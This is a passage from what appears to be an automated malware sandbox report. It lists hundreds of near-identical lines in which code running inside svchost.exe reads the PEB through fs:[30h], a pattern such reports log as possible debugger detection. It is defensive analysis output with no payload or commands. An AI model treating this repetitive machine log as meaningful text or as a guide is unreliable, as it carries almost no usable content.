            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB06F1 mov eax, dword ptr fs:[00000030h]2_2_03DB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D34690 mov eax, dword ptr fs:[00000030h]2_2_03D34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D34690 mov eax, dword ptr fs:[00000030h]2_2_03D34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D666B0 mov eax, dword ptr fs:[00000030h]2_2_03D666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03D6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4C640 mov eax, dword ptr fs:[00000030h]2_2_03D4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D62674 mov eax, dword ptr fs:[00000030h]2_2_03D62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF866E mov eax, dword ptr fs:[00000030h]2_2_03DF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF866E mov eax, dword ptr fs:[00000030h]2_2_03DF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A660 mov eax, dword ptr fs:[00000030h]2_2_03D6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A660 mov eax, dword ptr fs:[00000030h]2_2_03D6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72619 mov eax, dword ptr fs:[00000030h]2_2_03D72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE609 mov eax, dword ptr fs:[00000030h]2_2_03DAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4E627 mov eax, dword ptr fs:[00000030h]2_2_03D4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D66620 mov eax, dword ptr fs:[00000030h]2_2_03D66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D68620 mov eax, dword ptr fs:[00000030h]2_2_03D68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3262C mov eax, dword ptr fs:[00000030h]2_2_03D3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D365D0 mov eax, dword ptr fs:[00000030h]2_2_03D365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03D6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03D6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E5CF mov eax, dword ptr fs:[00000030h]2_2_03D6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E5CF mov eax, dword ptr fs:[00000030h]2_2_03D6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D325E0 mov eax, dword ptr fs:[00000030h]2_2_03D325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C5ED mov eax, dword ptr fs:[00000030h]2_2_03D6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C5ED mov eax, dword ptr fs:[00000030h]2_2_03D6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E59C mov eax, dword ptr fs:[00000030h]2_2_03D6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D32582 mov eax, dword ptr fs:[00000030h]2_2_03D32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D32582 mov ecx, dword ptr fs:[00000030h]2_2_03D32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D64588 mov eax, dword ptr fs:[00000030h]2_2_03D64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D545B1 mov eax, dword ptr fs:[00000030h]2_2_03D545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D545B1 mov eax, dword ptr fs:[00000030h]2_2_03D545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB05A7 mov eax, dword ptr fs:[00000030h]2_2_03DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB05A7 mov eax, dword ptr fs:[00000030h]2_2_03DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB05A7 mov eax, dword ptr fs:[00000030h]2_2_03DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38550 mov eax, dword ptr fs:[00000030h]2_2_03D38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38550 mov eax, dword ptr fs:[00000030h]2_2_03D38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6656A mov eax, dword ptr fs:[00000030h]2_2_03D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6656A mov eax, dword ptr fs:[00000030h]2_2_03D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6656A mov eax, dword ptr fs:[00000030h]2_2_03D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC6500 mov eax, dword ptr fs:[00000030h]2_2_03DC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E53E mov eax, dword ptr fs:[00000030h]2_2_03D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E53E mov eax, dword ptr fs:[00000030h]2_2_03D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E53E mov eax, dword ptr fs:[00000030h]2_2_03D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E53E mov eax, dword ptr fs:[00000030h]2_2_03D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E53E mov eax, dword ptr fs:[00000030h]2_2_03D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D304E5 mov ecx, dword ptr fs:[00000030h]2_2_03D304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEA49A mov eax, dword ptr fs:[00000030h]2_2_03DEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D644B0 mov ecx, dword ptr fs:[00000030h]2_2_03D644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03DBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D364AB mov eax, dword ptr fs:[00000030h]2_2_03D364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEA456 mov eax, dword ptr fs:[00000030h]2_2_03DEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2645D mov eax, dword ptr fs:[00000030h]2_2_03D2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5245A mov eax, dword ptr fs:[00000030h]2_2_03D5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5A470 mov eax, dword ptr fs:[00000030h]2_2_03D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5A470 mov eax, dword ptr fs:[00000030h]2_2_03D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5A470 mov eax, dword ptr fs:[00000030h]2_2_03D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBC460 mov ecx, dword ptr fs:[00000030h]2_2_03DBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D68402 mov eax, dword ptr fs:[00000030h]2_2_03D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D68402 mov eax, dword ptr fs:[00000030h]2_2_03D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D68402 mov eax, dword ptr fs:[00000030h]2_2_03D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A430 mov eax, dword ptr fs:[00000030h]2_2_03D6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2E420 mov eax, dword ptr fs:[00000030h]2_2_03D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2E420 mov eax, dword ptr fs:[00000030h]2_2_03D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2E420 mov eax, dword ptr fs:[00000030h]2_2_03D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2C427 mov eax, dword ptr fs:[00000030h]2_2_03D2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03DDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D50BCB mov eax, dword ptr fs:[00000030h]2_2_03D50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D50BCB mov eax, dword ptr fs:[00000030h]2_2_03D50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D50BCB mov eax, dword ptr fs:[00000030h]2_2_03D50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30BCD mov eax, dword ptr fs:[00000030h]2_2_03D30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30BCD mov eax, dword ptr fs:[00000030h]2_2_03D30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30BCD mov eax, dword ptr fs:[00000030h]2_2_03D30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38BF0 mov eax, dword ptr fs:[00000030h]2_2_03D38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38BF0 mov eax, dword ptr fs:[00000030h]2_2_03D38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38BF0 mov eax, dword ptr fs:[00000030h]2_2_03D38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5EBFC mov eax, dword ptr fs:[00000030h]2_2_03D5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03DBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40BBE mov eax, dword ptr fs:[00000030h]2_2_03D40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40BBE mov eax, dword ptr fs:[00000030h]2_2_03D40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03DE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03DE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDEB50 mov eax, dword ptr fs:[00000030h]2_2_03DDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE4B4B mov eax, dword ptr fs:[00000030h]2_2_03DE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE4B4B mov eax, dword ptr fs:[00000030h]2_2_03DE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC6B40 mov eax, dword ptr fs:[00000030h]2_2_03DC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC6B40 mov eax, dword ptr fs:[00000030h]2_2_03DC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFAB40 mov eax, dword ptr fs:[00000030h]2_2_03DFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD8B42 mov eax, dword ptr fs:[00000030h]2_2_03DD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2CB7E mov eax, dword ptr fs:[00000030h]2_2_03D2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E02B57 mov eax, dword ptr fs:[00000030h]2_2_03E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E02B57 mov eax, dword ptr fs:[00000030h]2_2_03E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E02B57 mov eax, dword ptr fs:[00000030h]2_2_03E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E02B57 mov eax, dword ptr fs:[00000030h]2_2_03E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5EB20 mov eax, dword ptr fs:[00000030h]2_2_03D5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5EB20 mov eax, dword ptr fs:[00000030h]2_2_03D5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF8B28 mov eax, dword ptr fs:[00000030h]2_2_03DF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF8B28 mov eax, dword ptr fs:[00000030h]2_2_03DF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30AD0 mov eax, dword ptr fs:[00000030h]2_2_03D30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D64AD0 mov eax, dword ptr fs:[00000030h]2_2_03D64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D64AD0 mov eax, dword ptr fs:[00000030h]2_2_03D64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D86ACC mov eax, dword ptr fs:[00000030h]2_2_03D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D86ACC mov eax, dword ptr fs:[00000030h]2_2_03D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D86ACC mov eax, dword ptr fs:[00000030h]2_2_03D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6AAEE mov eax, dword ptr fs:[00000030h]2_2_03D6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6AAEE mov eax, dword ptr fs:[00000030h]2_2_03D6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D68A90 mov edx, dword ptr fs:[00000030h]2_2_03D68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04A80 mov eax, dword ptr fs:[00000030h]2_2_03E04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38AA0 mov eax, dword ptr fs:[00000030h]2_2_03D38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38AA0 mov eax, dword ptr fs:[00000030h]2_2_03D38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D86AA4 mov eax, dword ptr fs:[00000030h]2_2_03D86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40A5B mov eax, dword ptr fs:[00000030h]2_2_03D40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40A5B mov eax, dword ptr fs:[00000030h]2_2_03D40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DACA72 mov eax, dword ptr fs:[00000030h]2_2_03DACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DACA72 mov eax, dword ptr fs:[00000030h]2_2_03DACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6CA6F mov eax, dword ptr fs:[00000030h]2_2_03D6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6CA6F mov eax, dword ptr fs:[00000030h]2_2_03D6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6CA6F mov eax, dword ptr fs:[00000030h]2_2_03D6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDEA60 mov eax, dword ptr fs:[00000030h]2_2_03DDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBCA11 mov eax, dword ptr fs:[00000030h]2_2_03DBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D54A35 mov eax, dword ptr fs:[00000030h]2_2_03D54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D54A35 mov eax, dword ptr fs:[00000030h]2_2_03D54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6CA38 mov eax, dword ptr fs:[00000030h]2_2_03D6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6CA24 mov eax, dword ptr fs:[00000030h]2_2_03D6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5EA2E mov eax, dword ptr fs:[00000030h]2_2_03D5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D649D0 mov eax, dword ptr fs:[00000030h]2_2_03D649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03DFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC69C0 mov eax, dword ptr fs:[00000030h]2_2_03DC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D629F9 mov eax, dword ptr fs:[00000030h]2_2_03D629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D629F9 mov eax, dword ptr fs:[00000030h]2_2_03D629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03DBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB89B3 mov esi, dword ptr fs:[00000030h]2_2_03DB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB89B3 mov eax, dword ptr fs:[00000030h]2_2_03DB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB89B3 mov eax, dword ptr fs:[00000030h]2_2_03DB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D309AD mov eax, dword ptr fs:[00000030h]2_2_03D309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D309AD mov eax, dword ptr fs:[00000030h]2_2_03D309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB0946 mov eax, dword ptr fs:[00000030h]2_2_03DB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD4978 mov eax, dword ptr fs:[00000030h]2_2_03DD4978
